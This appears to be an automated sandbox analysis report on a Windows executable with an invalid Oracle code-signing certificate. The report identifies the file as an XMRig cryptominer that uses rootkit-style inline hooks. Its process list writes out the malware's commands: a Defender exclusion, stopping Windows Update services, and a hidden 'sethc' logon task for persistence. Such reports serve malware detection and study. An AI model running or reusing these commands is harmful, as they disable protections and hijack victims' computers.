                                      Signature Issuer:CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 3/18/2019 5:00:00 PM 3/23/2022 5:00:00 AM
                                      Subject Chain
                                      • CN=Oracle Corporation, OU=Virtualbox, O=Oracle Corporation, L=Redwood Shores, S=CA, C=US
                                      Version:3
                                      Thumbprint MD5:2C3567A8535342474E8B4C4BC12317CB
                                      Thumbprint SHA-1:6F474206BCBB391BB82BA9E5DC0302DEF37AEBBE
                                      Thumbprint SHA-256:B6D977A471725F37DE725D31A36D4BE7CA6D0DABEB7F1F1F597E43045B83ABBE
                                      Serial:05308B76AC2E15B29720FB4395F65F38
                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      dec eax
                                      mov eax, dword ptr [009C1545h]
                                      mov dword ptr [eax], 00000001h
                                      call 00007FA828A254CFh
                                      nop
                                      nop
                                      dec eax
                                      add esp, 28h
                                      ret
                                      nop dword ptr [eax]
                                      dec eax
                                      sub esp, 28h
                                      dec eax
                                      mov eax, dword ptr [009C1525h]
                                      mov dword ptr [eax], 00000000h
                                      call 00007FA828A254AFh
                                      nop
                                      nop
                                      dec eax
                                      add esp, 28h
                                      ret
                                      nop dword ptr [eax]
                                      dec eax
                                      sub esp, 28h
                                      call 00007FA828A3DAE4h
                                      dec eax
                                      test eax, eax
                                      sete al
                                      movzx eax, al
                                      neg eax
                                      dec eax
                                      add esp, 28h
                                      ret
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      dec eax
                                      lea ecx, dword ptr [00000009h]
                                      jmp 00007FA828A257E9h
                                      nop dword ptr [eax+00h]
                                      ret
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      dec eax
                                      lea eax, dword ptr [009C74A9h]
                                      dec eax
                                      lea edx, dword ptr [eax+21h]
                                      mov byte ptr [eax], 00000000h
                                      dec eax
                                      add eax, 01h
                                      dec eax
                                      cmp eax, edx
                                      jne 00007FA828A25806h
                                      ret
                                      dec eax
                                      lea eax, dword ptr [009C7451h]
                                      dec eax
                                      lea edx, dword ptr [eax+18h]
                                      mov word ptr [eax], 0000h
                                      dec eax
                                      add eax, 02h
                                      dec eax
                                      cmp eax, edx
                                      jne 00007FA828A25804h
                                      ret
                                      dec eax
                                      lea eax, dword ptr [009C7417h]
                                      dec eax
                                      lea edx, dword ptr [eax+14h]
                                      mov word ptr [eax], 0000h
                                      dec eax
                                      add eax, 02h
                                      dec eax
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9ca0000xa34.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9cd0000xa80.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x9c40000x1230.pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x9c60000x4040
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9ce0000x330.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x9c20000x28.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x9ca28c0x250.idata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x1aa200x1ac00False0.4646429614485981data6.160137509897198IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data0x1c0000x9a26e00x9a2800unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata0x9bf0000x42700x4400False0.38338694852941174data4.987899244906076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .pdata0x9c40000x12300x1400False0.4341796875data4.865236906764568IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .xdata0x9c60000xf440x1000False0.241455078125data4.036582842306508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .bss0x9c70000x28e00x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata0x9ca0000xa340xc00False0.3046875data3.8892775409781057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .CRT0x9cb0000x600x200False0.06640625data0.3085875245953951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .tls0x9cc0000x100x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x9cd0000xa800xc00False0.3518880208333333data4.0923733872388315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .reloc0x9ce0000x3300x400False0.5712890625data4.774016362476347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x9cd1300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States
                                      RT_GROUP_ICON0x9cd4180x14dataEnglishUnited States
                                      RT_VERSION0x9cd4300x324dataEnglishUnited States
                                      RT_MANIFEST0x9cd7580x325XML 1.0 document, ASCII textEnglishUnited States
                                      DLLImport
                                      KERNEL32.dllCloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
                                      msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      No network behavior found

                                      Code Manipulations

                                      Function NameHook TypeActive in Processes
                                      ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                      NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                      ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                      NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                      ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                      NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                      NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                      ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                      ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                      NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                      RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                      NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                      NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                      ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                      ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                      Function NameHook TypeNew Data
                                      ZwEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                                      NtQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      ZwResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                                      NtDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                                      ZwDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                                      NtEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                                      NtQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                                      ZwEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                                      ZwQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      NtResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                                      RtlGetNativeSystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      NtQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                                      NtEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                                      ZwQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                                      ZwQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                                      Function NameHook TypeNew Data
                                      ZwEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                                      NtQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      ZwResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                                      NtDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                                      ZwDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                                      NtEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                                      NtQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                                      ZwEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                                      ZwQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      NtResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                                      RtlGetNativeSystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      NtQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                                      NtEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                                      ZwQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                                      ZwQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                                      Target ID:0
                                      Start time:13:29:07
                                      Start date:09/06/2023
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\Desktop\file.exe
                                      Imagebase:0x7ff66b520000
                                      File size:10264640 bytes
                                      MD5 hash:EEE7B971E0B76A0DF56BDAC2AC2FA343
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Target ID:1
                                      Start time:13:29:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                      Imagebase:0x7ff7466a0000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Target ID:2
                                      Start time:13:29:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:4
                                      Start time:13:29:22
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                      Imagebase:0x7ff7cb270000
                                      File size:273920 bytes
                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:5
                                      Start time:13:29:22
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:6
                                      Start time:13:29:22
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop UsoSvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:7
                                      Start time:13:29:23
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop WaaSMedicSvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:8
                                      Start time:13:29:23
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop wuauserv
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:9
                                      Start time:13:29:23
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop bits
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:10
                                      Start time:13:29:24
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop dosvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:11
                                      Start time:13:29:25
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\dialer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\dialer.exe
                                      Imagebase:0x7ff60f5c0000
                                      File size:36864 bytes
                                      MD5 hash:0EC74656A7F7667DD94C76081B111827
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:12
                                      Start time:13:29:25
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; }
                                      Imagebase:0x7ff7466a0000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:13
                                      Start time:13:29:25
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:14
                                      Start time:13:29:26
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\winlogon.exe
                                      Wow64 process (32bit):false
                                      Commandline:winlogon.exe
                                      Imagebase:0x7ff6b23f0000
                                      File size:677376 bytes
                                      MD5 hash:F9017F2DC455AD373DF036F5817A8870
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:15
                                      Start time:13:29:26
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\lsass.exe
                                      Imagebase:0x7ff6c5470000
                                      File size:57976 bytes
                                      MD5 hash:317340CD278A374BCEF6A30194557227
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:16
                                      Start time:13:29:28
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:17
                                      Start time:13:29:28
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:18
                                      Start time:13:29:28
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\dwm.exe
                                      Wow64 process (32bit):false
                                      Commandline:dwm.exe
                                      Imagebase:0x7ff66aed0000
                                      File size:62464 bytes
                                      MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:19
                                      Start time:13:29:39
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\wbem\WMIADAP.exe
                                      Wow64 process (32bit):false
                                      Commandline:wmiadap.exe /F /T /R
                                      Imagebase:0x7ff639610000
                                      File size:177664 bytes
                                      MD5 hash:9783D0765F31980950445DFD40DB15DA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:20
                                      Start time:13:29:46
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:21
                                      Start time:13:29:46
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:22
                                      Start time:13:29:47
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:23
                                      Start time:13:29:48
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000003.708438407.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000003.585943996.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000002.772856939.000001FDE6010000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000000.562936177.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000002.770922577.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000003.679943242.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000003.650224694.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:24
                                      Start time:13:29:50
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:25
                                      Start time:13:29:50
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:26
                                      Start time:13:29:51
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:27
                                      Start time:13:29:55
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:28
                                      Start time:13:29:56
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s EventSystem
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:31
                                      Start time:13:29:57
                                      Start date:09/06/2023
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                                      Imagebase:0x7ff652aa0000
                                      File size:10264640 bytes
                                      MD5 hash:EEE7B971E0B76A0DF56BDAC2AC2FA343
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000002.617274824.00007FF652ABC000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 41%, ReversingLabs

                                      Target ID:32
                                      Start time:13:29:57
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:33
                                      Start time:13:29:58
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:34
                                      Start time:13:29:59
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k appmodel -p -s camsvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:35
                                      Start time:13:30:00
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
